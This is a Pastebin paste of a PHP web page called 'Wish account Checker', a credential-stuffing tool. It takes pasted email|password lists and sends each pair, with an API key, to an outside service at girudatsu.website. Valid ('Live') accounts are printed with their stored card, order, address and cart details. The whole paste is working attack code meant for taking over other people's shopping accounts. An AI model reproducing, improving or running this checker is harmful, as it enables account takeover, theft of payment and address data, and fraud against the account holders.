Advertisement
Guest User

Untitled

a guest
Mar 19th, 2016
317
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.09 KB | None | 0 0
  1. <html>
  2. <head>
  3. <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
  4.  
  5. <!-- Bootstrap Start -->
  6. <link rel="stylesheet" href="http://themes.suggelab.com/dynamic/css/bootstrap.css">
  7. <link rel="stylesheet" href="http://themes.suggelab.com/dynamic/css/main.css">
  8. <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/js/bootstrap.min.js"></script>
  9. <script src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.9.2/jquery-ui.min.js"></script>
  10.  
  11. <title>Wish Checker </title>
  12. <style>
  13. body {
  14. padding-top: 60px;
  15. }
  16. </style>
  17. </head>
  18. <body>
  19. <div class="container">
  20. <div class="panel panel-primary panelMove toggle panelRefresh panelClose">
  21. <!-- Start .panel -->
  22. <div class="panel-heading">
  23. <h4 class="panel-title">Wish account Checker</h4>
  24. </div>
  25. <div class="panel-body">
  26. <form action="" method="POST">
  27. <textarea style="background:rgba(0,225,0,00);" name="mailpass" id="mailpass" style="width: 441px; height: 187px;" class="form-control" rows="7" placeholder="your@email.com|passW0rd"></textarea><br />
  28. <input type="text" style="width: 37px; height: 25px;" class="form-control" rows="7" name="delim" value="|">
  29. <button id=start value="WOOT" name="submit" class="btn btn-success">Check</button> <button id=stop value="WOOT" class="btn btn-success">Stop</button><br><br>
  30. <?php
  31. if(isset($_POST['submit'])){
  32. $delim = $_POST['delim'];
  33. function search($line, $delim)
  34. {
  35. $line = str_replace(" ", "", $line);
  36. $line = explode($delim, $line);
  37. $i = 0;
  38. while ($i < count($line)) {
  39. if (strpos($line[$i], '@') && strpos($line[$i], '.')) {
  40. $mail = $line[$i];
  41. $pass = $line[$i + 1];
  42. $i = 10000;
  43. if ($pass == "") {
  44. $pass = $line[$i - 1];
  45. }
  46. }
  47. $i++;
  48. }
  49. $line = $mail . "|" . $pass;
  50. $line = explode('|', $line);
  51. return $line;
  52. }
  53. $data = $_POST['mailpass'];
  54. $extract = explode("\r\n", $data);
  55. $i = 0;
  56. foreach ($extract AS $k => $line) {
  57. $i++;
  58. if (strpos($line, '=>') !== false) {
  59. $line = str_replace('=>', '|', $line);
  60. }
  61. if (strpos($line, ']') !== false) {
  62. $line = str_replace('=>', '|', $line);
  63. }
  64. if (strpos($line, '[') !== false) {
  65. $line = str_replace('=>', '|', $line);
  66. }
  67.  
  68. $info = search(trim($line), $delim);
  69. $email = trim($info[0]);
  70. $username = explode('@', $email);
  71. $user = $username[0];
  72. $pass = $info[1];
  73.  
  74. $dir = dirname(__FILE__);
  75. $config = $dir . '/_cook/' .rand(1,999999999999999). '.txt';
  76. if (!file_exists($config)) {
  77. $fp = @fopen($config, 'w');
  78. @fclose($fp);
  79. }
  80.  
  81. $cookie = 'cookie.txt';
  82. $ch = curl_init('http://girudatsu.website/api/wish');
  83. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  84. curl_setopt($ch,CURLOPT_POST,1);
  85. curl_setopt($ch,CURLOPT_RETURNTRANSFER,TRUE);
  86. curl_setopt($ch,CURLOPT_POST,TRUE);
  87. curl_setopt($ch,CURLOPT_FOLLOWLOCATION,TRUE);
  88. curl_setopt($ch,CURLOPT_COOKIEFILE,$config);
  89. curl_setopt($ch,CURLOPT_COOKIEJAR, $config);
  90. curl_setopt($ch,CURLOPT_POSTFIELDS,"api=stBkL5EIlAAGdR9XWlfYUjo&email=$email&password=$pass&socks5=$sock&output=json");
  91. curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
  92. $result = curl_exec($ch);
  93. $now = "<i style=\"color:blue\">Checked on Localhost at ".date("g:i a - F j, Y")."</i>";
  94. if(preg_match('/Email or Password is incorrect/i',$result)){
  95. echo "<font color=red><b>Die</b></font>| ".$email."|".$pass." <br>";
  96. } else {
  97. $hasil = json_decode($result);
  98. $z = json_decode($hasil, true);
  99. $cc=$z->code->msg->data->card;
  100. $or=$z->code->msg->data->order;
  101. $ad=$z->code->msg->data->address;
  102. $notif=$z->code->msg->data->notifCount;
  103. $cart=$z->code->msg->data->cartQuantity;
  104.  
  105. echo"Live | $email | $pass | Card: $cc | Order: $or | Address: $ad | Notif: $notif | Total cart: $cart | Hasil: $z | $now <br>";
  106.  
  107. }
  108.  
  109.  
  110. }
  111. }
  112.  
  113. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement